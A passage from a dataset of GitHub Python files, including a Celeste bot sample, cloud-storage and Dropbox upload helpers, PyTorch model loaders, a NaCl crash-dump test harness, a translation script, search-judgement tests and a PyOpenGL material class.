that for a small number of trees, the accuracy reaches its top\nBut after that, generally more trees is just equal less accurate (higher test error)\n\"\"\"\n","repo_name":"minhsphuc12/edX_AnalyticsEdge","sub_path":"Assignment2/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39682002369","text":"import matplotlib.pyplot as plt\nimport time\n\n\n# There's technically no init function, so we can make some global variables here:\nlevel_name = \"to show that we have an initial value\"\n\n# We can access these global variables from the \n\ndef new_level(data, debug_print):\n # You might want to create some kind of global dictionary to store the current level.\n debug_print(level_name)\n\n # Visualizing the current level/screen as a scatter plot (assuming you have the matplotlib library):\n solids = data[\"levelData\"][\"solids\"]\n\n # Just so you see how coordinates are set up:\n debug_print(data[\"levelData\"][\"levelOffset\"], data[\"levelData\"][\"levelSize\"])\n debug_print(solids[0], solids[1], solids[2])\n \n x = []\n y = []\n for coords in solids:\n x.append(coords[0])\n y.append(-coords[1])\n # We can also add the goal, just so we can see where we need to go:\n x.append(data[\"levelData\"][\"goal\"][0])\n y.append(-data[\"levelData\"][\"goal\"][1])\n plt.scatter(x,y)\n plt.plot()\n # This is saved into your Celeste Directory/level.png\n plt.savefig(\"level.png\")\n plt.clf()\n\nwant_to_jump = False\n\ndef update(data, debug_print):\n # BASIC INFORMATION\n # Print the data we're given. DON'T EVER USE PRINT().\n # We can see a copy of the statements from debug_print in your Celeste Directory/code_log.txt\n debug_print(data)\n # If you want some delay to read console information:\n #time.sleep(0.01)\n\n # We access our global variables from the scope:\n global level_name\n global want_to_jump\n\n if data[\"levelData\"][\"name\"] != level_name:\n debug_print(level_name)\n debug_print(\"Wow! New level!\")\n level_name = data[\"levelData\"][\"name\"]\n new_level(data, debug_print)\n \n # You'll notice adding R (right) to the inputs will cause the player to move right.\n # Adding U (Up) to the inputs however, results in no changes, because divisions.ini doesn't allow code in the head folder to use up. \n return_str = \"RU\"\n\n # You'll notice that if we print something, it won't show up anywhere or influence the game (so use debug_print!):\n print(\"I AM JUMPING JUMPING JUMPING WHEEEE X\")\n\n # We need to reset jumping every time we die (try holding down the jump button in celeste, dying, and then keep holding jump. Nothing will happen.)\n # Time resets after death, and so we wait to apply inputs until after we've respawned.\n if data[\"player\"][\"currentState\"] != \"Player.StIntroRespawn\" and data[\"player\"][\"onGround\"] or data[\"player\"][\"jumpTimer\"] > 0:\n return_str += \"J\"\n # If we wanted to jump from the last frame, but that's not happening because there is no jump timer (because the player just died or something), we need to temporarily release the jump button:\n if want_to_jump and data[\"player\"][\"jumpTimer\"] <= 0:\n return_str = \"RU\"\n want_to_jump = False\n else:\n want_to_jump = True\n # Continually go to the right (and jump if we can):\n return return_str","repo_name":"GDACollab/ProgrammingPlaysCeleste","sub_path":"code/head/samplescript.py","file_name":"samplescript.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3922317716","text":"from google.cloud import storage\nimport os\nfrom random import choice\nfrom datetime import datetime\nimport dropbox\nfrom pydub import AudioSegment\nimport pandas as pd\nfrom dotenv import load_dotenv\n\n\"Handles all downloads / uploads to GCP Storage and Dropbox\"\n\n# Loads all .env variables\nload_dotenv()\n\n# env variables for G-Cloud functions\nGCP_API_KEY = os.getenv('GCP_API_KEY')\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = GCP_API_KEY\nconfig = {\n \"language_code\": \"en-US\",\n \"enable_word_time_offsets\": True,\n \"enable_automatic_punctuation\": True\n}\n\n# General DB Update\n\n\ndef db_update(info_dict, path=\"Data/AutoRedditDB.csv\"):\n \"\"\"Accesses the previous database and appends new info from scrapes\n\ninfo: \n list of info from desired scrape\npath: \n path to the current database\"\"\"\n\n try:\n old_df = pd.read_csv(path, index_col=0)\n apppendable = pd.DataFrame(info_dict, index=[0])\n new_df = pd.concat([old_df, apppendable], ignore_index=True)\n new_df.to_csv(path, mode='w')\n print(\"\\nData appended to local database successfully.\\n\")\n\n except:\n apppendable.to_csv(f\"{info_dict['Id']}_info_dict.csv\")\n print(\"\\nIncomplete information, please review appendable.\\n\")\n\n try:\n storage_client = storage.Client()\n bucket = storage_client.get_bucket('autoreddit-database')\n blob = bucket.get_blob(\"AutoRedditDB.csv\")\n blob.upload_from_filename(path)\n print(\"\\nDatabase uploaded to GCP successfully.\\n\")\n\n except Exception as e:\n print(f\"\\nData has not been uploaded to GCP due to exception: {e} \\n\")\n\n return True\n\n# Uploads t2s audio to GCP for s2t analyzer\n\n\ndef upload_audio(audiopath, info_dict):\n \"\"\"Uploads the final audio file from t2s into GCP for analyzation by s2t\n\naudiopath:\n path to final audio on local disk\ninfo_dict:\n dictionary returned by csv2dict function\n\nReturns:\n uri: uri to GCP audio file\n duration: duration of audio in seconds (float format)\"\"\"\n\n print(\"\\nUploading audio file to GCP storage.\\n\")\n duration = AudioSegment.from_file(audiopath).duration_seconds\n id = info_dict['Id']\n storage_client = storage.Client()\n bucket = storage_client.get_bucket('audio_for_s2t')\n blob = bucket.blob(f\"{id}_t2s.wav\")\n blob.upload_from_filename(audiopath, num_retries=3)\n\n uri = dict(uri=f\"gs://audio_for_s2t/{id}_t2s.wav\")\n\n print(\n f\"\\nAudio uploaded to storage.\\n\\n\\nDuration of audio is {duration}s.\\n\")\n return (uri, duration)\n\n# Downloads bg video / audio from gcs\n\n\ndef gcs_video_downloader(downloads_path, duration, name):\n \"\"\"Pulls a random bg_video from the desired bucket\n\ndownloads_path:\n path to downloads folder \nduration:\n time of current audio\nprefix:\n denotes the folder within the bucket which holds desired bgvideos\n\nReturns: path to the downloaded video to be sent to CCR\n\"\"\"\n if name == \"ari\":\n prefix = \"ari_bg_videos/\"\n if name == \"alex\":\n prefix = \"alex_bg_videos/\"\n\n # Note: Client.list_blobs requires at least package version 1.17.0.\n storage_client = storage.Client()\n bucket = storage_client.get_bucket('bg_videos')\n blobs = bucket.list_blobs(prefix=prefix)\n\n print(\"\\nChoosing video to download.\\n\")\n # Note: The call returns a response only when the iterator is consumed.\n blob_list = [x.name for x in blobs]\n blob_names = [x.split(\"/\")[-1]\n for x in blob_list if x.split(\"/\")[-1] != '']\n folder_name = blob_list[0]\n video_time = 0\n if float(duration) > 180:\n video_time = 6\n elif float(duration) > 60:\n video_time = 3\n else:\n video_time = 1\n filter_lst = [x for x in blob_names if x[0] == str(video_time) and x != '']\n video = choice(filter_lst)\n uri = f\"gs://{bucket.name}/{folder_name}{video}\"\n output_path = os.path.join(\n downloads_path, f\"{datetime.today().date()}-bgvideo.webm\")\n\n print(\"\\nDownloading chosen video from GCP.\\n\")\n with open(output_path, 'wb') as f:\n storage_client.download_blob_to_file(blob_or_uri=uri, file_obj=f)\n\n storage_client.close() # Closes client\n\n print(\"\\nVideo downloaded.\\n\")\n return output_path\n\n# Uploading files to GCS\n\n\ndef upload_to_gcs(final_renders_path, info_dict):\n \"\"\"Uploads final cuts to GCS storage\n\nfinal_renders_path:\n path to final renders folder\ninfo_dict:\n dictionary returend from csv2dict function\n\nReturns:\n name for the GCP folder that the finals are saved under\"\"\"\n\n # Downloads the directory or files after -r to the bucket after gs://\n # os.system(f'gsutil cp -r {final_renders_path} gs://finals_for_upload')\n id = info_dict[\"Id\"]\n\n os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = \"Data/autoreddit-377319-e4460975370b.json\"\n storage_client = storage.Client()\n print(\"\\nBeginning upload of final cuts to GCP.\\n\")\n\n # Upload final video files\n bucket = storage_client.get_bucket('finals_for_upload')\n split = final_renders_path.split(\"/\")\n today = datetime.today()\n date_of_upload = today.date()\n time_of_upload = str(today.now().time())[:5]\n folder = f\"{date_of_upload}_{time_of_upload}_{id}\"\n files = os.listdir(final_renders_path)\n for file in files:\n path = os.path.join(os.getcwd(), final_renders_path, file)\n blob = bucket.blob(f\"{folder}/{file}\")\n blob.upload_from_filename(path)\n\n storage_client.close()\n\n print(\"\\nFinal cuts upload to GCP complete.\\n\")\n return folder\n\n# Uploading to dropbox\n\n\ndef dropbox_upload(final_renders_path, info_dict, name):\n \"\"\"Uploads final cuts to Dropbox cloud storage\n\nfinal_renders_path:\n path to final renders folder\ninfo_dict:\n dictionary returend from csv2dict function\"\"\"\n\n post_id = info_dict['Id']\n \n # Create a Dropbox client\n dropbox_key = os.getenv('DROPBOX_KEY')\n dropbox_secret = os.getenv('DROPBOX_SECRET')\n dropbox_oauth_refresh = os.getenv('DROPBOX_OAUTH_REFRESH')\n dbx = dropbox.Dropbox(app_key=dropbox_key,\n app_secret=dropbox_secret,\n oauth2_refresh_token=dropbox_oauth_refresh)\n\n # Define the path of the new folder to create\n new_folder_path = f\"/{name}_{datetime.now().date()}_{post_id}\"\n\n # Create the new folder\n try:\n dbx.files_create_folder(new_folder_path)\n print(\n f\"\\nNew Dropbox folder '{new_folder_path}' created successfully!\\n\")\n except dropbox.exceptions.ApiError as e:\n print(\"\\nError creating new folder:\", e)\n\n # Define the path of the video file to upload\n try:\n finals = os.listdir(final_renders_path)\n for x in finals:\n file = os.path.join(final_renders_path, x)\n\n # Open the video file and read its contents\n with open(file, \"rb\") as f:\n file_contents = f.read()\n\n # Define the path of the new video file in Dropbox\n new_video_file_path = new_folder_path + f\"/{x}\"\n\n # Upload the video file to Dropbox\n dbx.files_upload(file_contents, new_video_file_path)\n print(f\"Video file {x} uploaded successfully!\")\n\n except dropbox.exceptions.ApiError as e:\n print(\"\\nError uploading video file:\", e)\n\n print(\"\\nFinal cuts upload to Dropbox complete.\\n\")\n return True\n","repo_name":"garrettfazzino/AutoReddit_v.2.0.1","sub_path":"Processes/CloudStorage.py","file_name":"CloudStorage.py","file_ext":"py","file_size_in_byte":7322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28268558329","text":"import torch\n\nfrom CLAPPVision.vision.models import FullModel, ClassificationModel\nfrom CLAPPVision.utils import model_utils\n\n\ndef load_model_and_optimizer(opt, num_GPU=None, reload_model=False, calc_loss=True):\n\n model = FullModel.FullVisionModel(\n opt, calc_loss\n )\n\n optimizer = []\n if opt.model_splits == 1:\n optimizer.append(torch.optim.Adam(model.parameters(), lr=opt.learning_rate, weight_decay=opt.weight_decay))\n elif opt.model_splits >= 2:\n # use separate optimizer for each module, so gradients don't get mixed up\n for idx, layer in enumerate(model.encoder):\n optimizer.append(torch.optim.Adam(layer.parameters(), lr=opt.learning_rate, weight_decay=opt.weight_decay))\n else:\n raise NotImplementedError\n # Note: module.parameters() acts recursively by default and adds all parameters of submodules as well\n\n model, num_GPU = model_utils.distribute_over_GPUs(opt, model, num_GPU=num_GPU)\n\n model, optimizer = model_utils.reload_weights(\n opt, model, optimizer, reload_model=reload_model\n )\n\n return model, optimizer\n\ndef load_classification_model(opt):\n if opt.in_channels == None:\n in_channels = 1024\n else:\n in_channels = opt.in_channels\n\n if opt.dataset == \"stl10\" or opt.dataset == \"cifar10\":\n num_classes = 10\n elif opt.dataset == \"cifar100\":\n num_classes = 100\n else:\n raise Exception(\"Invalid option\")\n\n classification_model = ClassificationModel.ClassificationModel(\n in_channels=in_channels, num_classes=num_classes,\n ).to(opt.device)\n\n return classification_model\n","repo_name":"EPFL-LCN/pub-illing2021-neurips","sub_path":"vision/CLAPPVision/vision/models/load_vision_model.py","file_name":"load_vision_model.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"} +{"seq_id":"28127223037","text":"import os\nimport subprocess\nimport sys\nimport tempfile\nimport time\n\nscript_dir = os.path.dirname(__file__)\nsys.path.append(os.path.join(script_dir,\n '../../tools/browser_tester'))\n\nimport browser_tester\nimport browsertester.browserlauncher\n\n# This script extends browser_tester to check for the presence of\n# Breakpad crash dumps.\n\n\n# This reads a file of lines containing 'key:value' pairs.\n# The file contains entries like the following:\n# plat:Win32\n# prod:Chromium\n# ptype:nacl-loader\n# rept:crash svc\ndef ReadDumpTxtFile(filename):\n dump_info = {}\n fh = open(filename, 'r')\n for line in fh:\n if ':' in line:\n key, value = line.rstrip().split(':', 1)\n dump_info[key] = value\n fh.close()\n return dump_info\n\n\ndef StartCrashService(browser_path, dumps_dir, windows_pipe_name,\n cleanup_funcs, crash_service_exe):\n # Find crash_service.exe relative to chrome.exe. This is a bit icky.\n browser_dir = os.path.dirname(browser_path)\n proc = subprocess.Popen([os.path.join(browser_dir, crash_service_exe),\n '--dumps-dir=%s' % dumps_dir,\n '--pipe-name=%s' % windows_pipe_name])\n\n def Cleanup():\n # Note that if the process has already exited, this will raise\n # an 'Access is denied' WindowsError exception, but\n # crash_service.exe is not supposed to do this and such\n # behaviour should make the test fail.\n proc.terminate()\n status = proc.wait()\n sys.stdout.write('crash_dump_tester: %s exited with status %s\\n'\n % (crash_service_exe, status))\n\n cleanup_funcs.append(Cleanup)\n\n\ndef GetDumpFiles(dumps_dir):\n all_files = [os.path.join(dumps_dir, dump_file)\n for dump_file in os.listdir(dumps_dir)]\n sys.stdout.write('crash_dump_tester: Found %i files\\n' % len(all_files))\n for dump_file in all_files:\n sys.stdout.write(' %s\\n' % dump_file)\n return [dump_file for dump_file in all_files\n if dump_file.endswith('.dmp')]\n\n\ndef Main(cleanup_funcs):\n parser = browser_tester.BuildArgParser()\n parser.add_option('--expected_crash_dumps', dest='expected_crash_dumps',\n type=int, default=0,\n help='The number of crash dumps that we should expect')\n parser.add_option('--expected_process_type_for_crash',\n dest='expected_process_type_for_crash',\n type=str, default='nacl-loader',\n help='The type of Chromium process that we expect the '\n 'crash dump to be for')\n # Ideally we would just query the OS here to find out whether we are\n # running x86-32 or x86-64 Windows, but Python's win32api module\n # does not contain a wrapper for GetNativeSystemInfo(), which is\n # what NaCl uses to check this, or for IsWow64Process(), which is\n # what Chromium uses. Instead, we just rely on the build system to\n # tell us.\n parser.add_option('--win64', dest='win64', action='store_true',\n help='Pass this if we are running tests for x86-64 Windows')\n options, args = parser.parse_args()\n\n dumps_dir = tempfile.mkdtemp(prefix='nacl_crash_dump_tester_')\n def CleanUpDumpsDir():\n browsertester.browserlauncher.RemoveDirectory(dumps_dir)\n cleanup_funcs.append(CleanUpDumpsDir)\n\n # To get a guaranteed unique pipe name, use the base name of the\n # directory we just created.\n windows_pipe_name = r'\\\\.\\pipe\\%s_crash_service' % os.path.basename(dumps_dir)\n\n # This environment variable enables Breakpad crash dumping in\n # non-official builds of Chromium.\n os.environ['CHROME_HEADLESS'] = '1'\n if sys.platform == 'win32':\n # Override the default (global) Windows pipe name that Chromium will\n # use for out-of-process crash reporting.\n os.environ['CHROME_BREAKPAD_PIPE_NAME'] = windows_pipe_name\n # Launch the x86-32 crash service so that we can handle crashes in\n # the browser process.\n StartCrashService(options.browser_path, dumps_dir, windows_pipe_name,\n cleanup_funcs, 'crash_service.exe')\n if options.win64:\n # Launch the x86-64 crash service so that we can handle crashes\n # in the NaCl loader process (nacl64.exe).\n StartCrashService(options.browser_path, dumps_dir, windows_pipe_name,\n cleanup_funcs, 'crash_service64.exe')\n # We add a delay because there is probably a race condition:\n # crash_service.exe might not have finished doing\n # CreateNamedPipe() before NaCl does a crash dump and tries to\n # connect to that pipe.\n # TODO(mseaborn): We could change crash_service.exe to report when\n # it has successfully created the named pipe.\n time.sleep(1)\n elif sys.platform == 'darwin':\n os.environ['BREAKPAD_DUMP_LOCATION'] = dumps_dir\n\n result = browser_tester.Run(options.url, options)\n\n dmp_files = GetDumpFiles(dumps_dir)\n failed = False\n msg = ('crash_dump_tester: ERROR: Got %i crash dumps but expected %i\\n' %\n (len(dmp_files), options.expected_crash_dumps))\n if len(dmp_files) != options.expected_crash_dumps:\n sys.stdout.write(msg)\n failed = True\n # On Windows, the crash dumps should come in pairs of a .dmp and\n # .txt file.\n if sys.platform == 'win32':\n for dump_file in dmp_files:\n second_file = dump_file[:-4] + '.txt'\n msg = ('crash_dump_tester: ERROR: File %r is missing a corresponding '\n '%r file\\n' % (dump_file, second_file))\n if not os.path.exists(second_file):\n sys.stdout.write(msg)\n # TODO(mseaborn): Investigate and remove this workaround.\n if (options.expected_process_type_for_crash == 'browser' and\n sys.platform == 'win32'):\n sys.stdout.write('crash_dump_tester: Ignoring this error on Windows '\n 'because the .txt file is sometimes missing -- '\n 'see http://crbug.com/169394\\n')\n continue\n failed = True\n continue\n # Check that the crash dump comes from the NaCl process.\n dump_info = ReadDumpTxtFile(second_file)\n if 'ptype' in dump_info:\n msg = ('crash_dump_tester: ERROR: Unexpected ptype value: %r != %r\\n'\n % (dump_info['ptype'], options.expected_process_type_for_crash))\n if dump_info['ptype'] != options.expected_process_type_for_crash:\n sys.stdout.write(msg)\n failed = True\n else:\n sys.stdout.write('crash_dump_tester: ERROR: Missing ptype field\\n')\n failed = True\n # TODO(mseaborn): Ideally we would also check that a backtrace\n # containing an expected function name can be extracted from the\n # crash dump.\n\n if failed:\n sys.stdout.write('crash_dump_tester: FAILED\\n')\n result = 1\n else:\n sys.stdout.write('crash_dump_tester: PASSED\\n')\n\n return result\n\n\ndef MainWrapper():\n cleanup_funcs = []\n try:\n return Main(cleanup_funcs)\n finally:\n for func in cleanup_funcs:\n func()\n\n\nif __name__ == '__main__':\n sys.exit(MainWrapper())\n","repo_name":"Netflix/NfWebCrypto","sub_path":"plugin/ppapi/ppapi/native_client/tests/breakpad_crash_test/crash_dump_tester.py","file_name":"crash_dump_tester.py","file_ext":"py","file_size_in_byte":7001,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"72"} +{"seq_id":"42567062340","text":"import json\n\nfrom nltk import tokenize\nfrom tqdm import tqdm\nfrom transformers import pipeline\n\n\ndef translate_sentence(sentence, translator):\n if len(translator.tokenizer.tokenize(sentence)) < 256:\n return translator(sentence, max_length=256)[0]['translation_text']\n else:\n return \"\"\n\n\ndef translate_paragraph(paragraph, translator):\n sentences = tokenize.sent_tokenize(paragraph)\n result = ' '.join([translate_sentence(sentence, translator)\n for sentence in sentences])\n if not result:\n print(\"WARNING: there may be empty paragraphs after translation\")\n return result\n\n\ndef translate_paragraphs(paragraphs, indices, translator):\n translated = []\n progress = tqdm(total=len(indices))\n for i in indices:\n translated.append(\n {'paragraph': translate_paragraph(paragraphs[i]['translation']['in'], translator),\n 'language': 'indonesian'})\n progress.update(1)\n return translated\n\n\nif __name__ == '__main__':\n model_checkpoint = \"Helsinki-NLP/opus-mt-id-en\"\n translator = pipeline(\"translation\", model=model_checkpoint, device=0)\n paragraphs = []\n with open('data/original/indonesian/for_monolingual.jsonl') as f:\n for line in f:\n paragraphs.append(json.loads(line))\n\n test_paragraphs = translate_paragraphs(paragraphs, range(1600, 1950), translator)\n test_json = json.dumps(test_paragraphs, indent=4)\n with open(\"data/translated/from_indonesian/test_helsinki.json\", \"w\") as file:\n file.write(test_json)\n\n train_paragraphs = translate_paragraphs(paragraphs, range(1600), translator)\n train_json = json.dumps(train_paragraphs, indent=4)\n with open(\"data/translated/from_indonesian/train_helsinki.json\", \"w\") as file:\n file.write(train_json)\n\n\n","repo_name":"whitejeep600/translation_language_detection","sub_path":"scripts/helsinki_translate.py","file_name":"helsinki_translate.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"52967919","text":"# coding=utf-8\nimport json\nfrom mock import MagicMock\nimport yt.wrapper as yt\nimport pytest\n\nimport judgements\nfrom test_utils import create_serp, create_component\nfrom enrichments import SINSIG_ENRICHMENT, IMAGES_RELEVANCE_ENRICHMENT, RELEVANCE_ENRICHMENT\n\n\nQUERY = {\n 'text': 'test',\n 'country': 'RU',\n 'device': 'DESKTOP',\n 'region': {'id': 1}\n}\n\nCOMPONENT = create_component(url='http://test')\nIMAGES_QUERY = {\n 'text': 'test',\n 'country': 'RU',\n 'device': 'DESKTOP',\n 'region': {'id': 1},\n \"params\": [\n {\n 'name': 'query_date',\n 'value': 'testdate'\n },\n {\n 'name': 'queryfresh',\n 'value': 'testfresh'\n }\n ]\n}\nIMAGES_COMPONENT = {\n 'url.imageBigThumbHref': 'http://test',\n 'url.mimcaMdsUrl': 'http://mimcaurl',\n 'long.MIMCA_CRC64': 1,\n 'dimension.MIMCA_IMAGE_DIMENSION': {'w': 1, 'h': 2},\n 'componentUrl': {'pageUrl': 'http://pageurl'}\n}\n\nJI = {\n 'query': 'test',\n 'region_id': 1,\n 'country': 'RU',\n 'device': 'DESKTOP',\n 'url': 'http://test'\n}\nIMAGE_JI = {\n 'query': 'test',\n 'region_id': 1,\n 'country': 'RU',\n 'device': 'DESKTOP',\n 'image_url': 'test/'\n}\n\nIMAGE_HITMAN_JI = {\n 'NULLABLE.COMPONENT.url.mimcaMdsUrl': \"http://mimcaurl\",\n \"NULLABLE.COMPONENT.long.MIMCA_CRC64\": 1,\n 'component_page_url': \"http://pageurl\",\n \"query_text\": \"test\",\n \"query_region_id\": 1,\n \"component_image_url\": \"http://test\",\n \"query_country\": \"RU\",\n \"NULLABLE.COMPONENT.dimension.IMAGE_DIMENSION\": {\n \"h\": 2,\n \"w\": 1\n },\n \"query_device\": \"DESKTOP\",\n \"component_mimca_image_url\": \"http://test\",\n \"NULLABLE.SERP.serp_query_param.query_date\": \"testdate\",\n \"NULLABLE.SERP.serp_query_param.queryfresh\": \"testfresh\"\n}\nRELEVANCE_ASSESSMENT = {'relevance': 'RELEVANT_PLUS'}\n\n\ndef check_relevance(component):\n return component[judgements.RELEVANCE_SCALE]['name'] == \"RELEVANT_PLUS\"\n\n\ndef check_images_relevance(component):\n return component[judgements.IMAGES_RELEVANCE_SCALE]['name'] == \"RELEVANT_PLUS\"\n\n\nSINSIG_TAG = \"web_world_validate.201810\"\n\n\nSINSIG_QUERY = {\n \"text\": \"кто польжунтся маслом с проблемной кожи\",\n \"country\": \"BY\",\n \"device\": \"IPHONE\",\n \"region\": {\"id\": 157},\n \"params\": [\n {\n \"name\": \"query_group_tag\",\n \"value\": SINSIG_TAG\n }\n ]\n}\nSINSIG_COMPONENT = create_component(url=\"https://irecommend.ru/content/eto-voobshche-zakonno-ispolzovat-maslo-dlya-zhirnoi-problemnoi-kozhi-istoriya-o-tom-kak-ya-n\")\nSINSIG_JI = {\n \"qurl_id\": \"ceb88c18d54c7324565726eafc4edef02fbd8f5efaf2419bdf111b48\"\n}\nSINSIG_ASSESSMENT = {\n \"slider_values\": [\n -1.0,\n -1.0,\n 30.143064852500000228\n ],\n \"judgement_values\": [\n \"RELEVANCE_MINUS_GOOD\",\n \"RELEVANCE_MINUS_GOOD\",\n \"SLIDER_GRADE\"\n ],\n \"spec_scores\": [\n 2.619474618599999971,\n 5.2019770203000001985,\n 1.1131916373999999337\n ]\n}\n\n\ndef check_sinsig(component):\n v1 = json.loads(component[judgements.JUDGEMENTS_SINSIG_JUDGEMENT_VALUES][\"name\"]) == SINSIG_ASSESSMENT[\"judgement_values\"]\n v2 = json.loads(component[judgements.JUDGEMENTS_SINSIG_SLIDER_VALUES][\"name\"]) == SINSIG_ASSESSMENT[\"slider_values\"]\n v3 = json.loads(component[judgements.JUDGEMENTS_SINSIG_SPEC_SCORES][\"name\"]) == SINSIG_ASSESSMENT[\"spec_scores\"]\n return v1 and v2 and v3\n\nENRICHMENT = RELEVANCE_ENRICHMENT\nIMAGES_ENRICHMENT = IMAGES_RELEVANCE_ENRICHMENT\n\n\ndef test_add_judgements_empty():\n yt.lookup_rows = MagicMock()\n\n ENRICHMENT.add_judgements([])\n\n yt.lookup_rows.assert_not_called()\n\n\ndef test_skip_not_valid_components():\n yt.lookup_rows = MagicMock()\n\n ENRICHMENT.add_judgements([create_serp([{}], query=QUERY)])\n\n yt.lookup_rows.assert_not_called()\n\n\ndef test_add_missing_judgements():\n hash = ENRICHMENT.get_hash(JI, lambda x: x)\n judgement = {'hash': hash, 'assessment_result': {}}\n yt.lookup_rows = MagicMock(return_value=[judgement])\n serp = create_serp(query=QUERY, components=[COMPONENT.copy()])\n\n ENRICHMENT.add_judgements([serp])\n\n assert judgements.RELEVANCE_SCALE not in serp.components[0]\n\n\ndef test_looks_like_judgement():\n assert judgements.looks_like_judgement({judgements.HIT_TYPE_FIELD: 'test_hit_type'})\n\n\ndef test_dont_looks_like_judgement():\n assert not judgements.looks_like_judgement({'k': 'v'})\n\n\ndef test_get_ji():\n assert ENRICHMENT.get_ji(QUERY, COMPONENT) == JI\n\n\ndef test_get_ji_no_url():\n assert ENRICHMENT.get_ji(QUERY, {}) is None\n\n\ndef test_get_ji_no_query():\n assert ENRICHMENT.get_ji({}, COMPONENT) is None\n\n\ndef test_get_hitman_ji():\n assert ENRICHMENT.get_hitman_ji(QUERY, COMPONENT) ==\\\n {\n 'query_text': 'test',\n 'query_region_id': 1,\n 'query_country': 'RU',\n 'query_device': 'DESKTOP',\n 'component_page_url_or_site_link_url': 'http://test',\n 'NULLABLE.SERP.query_param.navmx_tmp': None\n }\n\n\ndef test_get_hitman_ji_navmx():\n query = QUERY.copy()\n query['params'] = [{'name': 'navmx_tmp', 'value': '0.5'}]\n assert ENRICHMENT.get_hitman_ji(query, COMPONENT) ==\\\n {\n 'query_text': 'test',\n 'query_region_id': 1,\n 'query_country': 'RU',\n 'query_device': 'DESKTOP',\n 'component_page_url_or_site_link_url': 'http://test',\n 'NULLABLE.SERP.query_param.navmx_tmp': 0.5\n }\n\n\ndef test_get_hitman_ji_no_url():\n assert ENRICHMENT.get_hitman_ji(QUERY, {}) is None\n\n\ndef test_get_hitman_ji_no_query():\n assert ENRICHMENT.get_hitman_ji({}, COMPONENT) is None\n\n\ndef test_get_hitman_ji_sinsig():\n assert SINSIG_ENRICHMENT.get_hitman_ji(SINSIG_QUERY, SINSIG_COMPONENT) == {\n 'query_text': SINSIG_QUERY['text'],\n 'query_region_id': SINSIG_QUERY['region']['id'],\n 'query_country': SINSIG_QUERY['country'],\n 'query_device': SINSIG_QUERY['device'],\n 'component_page_url': SINSIG_COMPONENT['componentUrl']['pageUrl'],\n 'SERP.query_param.query_group_tag': SINSIG_TAG\n }\n\n\ndef test_get_hitman_ji_images():\n assert IMAGES_ENRICHMENT.get_hitman_ji(IMAGES_QUERY, IMAGES_COMPONENT) == IMAGE_HITMAN_JI\n\n\ndef test_get_image_url_empty():\n assert judgements.get_image_url({}) is None\n\n\ndef test_get_image_url_big_thumb():\n assert judgements.get_image_url(IMAGES_COMPONENT) == 'http://test'\n\n\ndef test_get_image_url_candidates():\n assert judgements.get_image_url({'imageadd': {'candidates': ['url']}}) == 'url'\n\n\ndef test_images_get_ji():\n assert IMAGES_ENRICHMENT.get_ji(QUERY, IMAGES_COMPONENT) == IMAGE_JI\n\n\n@pytest.mark.parametrize('enrichment, ji, component, check', [\n (ENRICHMENT, JI, COMPONENT, check_relevance),\n (IMAGES_ENRICHMENT, IMAGE_JI, IMAGES_COMPONENT, check_images_relevance)\n])\ndef test_add_judgements(enrichment, ji, component, check):\n hash = enrichment.get_hash(ji, lambda x: x)\n judgement = {'hash': hash, 'assessment_result': RELEVANCE_ASSESSMENT}\n yt.lookup_rows = MagicMock(return_value=[judgement])\n serp = create_serp(query=QUERY, components=[component.copy()])\n\n enrichment.add_judgements([serp])\n\n assert check(serp.components[0])\n\n\n@pytest.mark.parametrize('enrichment, ji, assessment, query, component, check', [\n (ENRICHMENT, JI, RELEVANCE_ASSESSMENT, QUERY, COMPONENT, check_relevance),\n (IMAGES_ENRICHMENT, IMAGE_JI, RELEVANCE_ASSESSMENT, QUERY, IMAGES_COMPONENT, check_images_relevance),\n (SINSIG_ENRICHMENT, SINSIG_JI, SINSIG_ASSESSMENT, SINSIG_QUERY, SINSIG_COMPONENT, check_sinsig)\n])\ndef test_add_judgements_for_two_same_serps(enrichment, ji, assessment, query, component, check):\n hash = enrichment.get_hash(ji, lambda x: x)\n judgement = {'hash': hash, 'assessment_result': assessment}\n yt.lookup_rows = MagicMock(return_value=[judgement])\n serp = create_serp(query=query, components=[component.copy()])\n serp_copy = create_serp(query=query, components=[component.copy()])\n\n enrichment.add_judgements([serp, serp_copy])\n\n assert check(serp.components[0])\n assert check(serp_copy.components[0])\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"Search engine/tests/judgements_test.py","file_name":"judgements_test.py","file_ext":"py","file_size_in_byte":8175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35098842235","text":"import OpenGL.GL as GL\n\nfrom py3d.material.basic import BasicMaterial\n\n\nclass PointMaterial(BasicMaterial):\n def __init__(self, vertex_shader_code=None, fragment_shader_code=None, property_dict=None, use_vertex_colors=True):\n super().__init__(vertex_shader_code, fragment_shader_code, use_vertex_colors)\n # Render vertices as points\n self._setting_dict[\"drawStyle\"] = GL.GL_POINTS\n # Set the width and height of points, in pixels\n self._setting_dict[\"pointSize\"] = 8\n # Draw points as rounded\n self._setting_dict[\"roundedPoints\"] = False\n self.set_properties(property_dict)\n\n def update_render_settings(self):\n GL.glPointSize(self._setting_dict[\"pointSize\"])\n if self._setting_dict[\"roundedPoints\"]:\n GL.glEnable(GL.GL_POINT_SMOOTH)\n else:\n GL.glDisable(GL.GL_POINT_SMOOTH)\n","repo_name":"ax-va/PyOpenGL-Pygame-Stemkoski-Pascale-2021","sub_path":"py3d/material/point.py","file_name":"point.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"12053574392","text":"import re\nimport shutil\nimport os\nimport sqlite3\nfrom sqlite3 import Error\n\nsql_path = '' # ex) 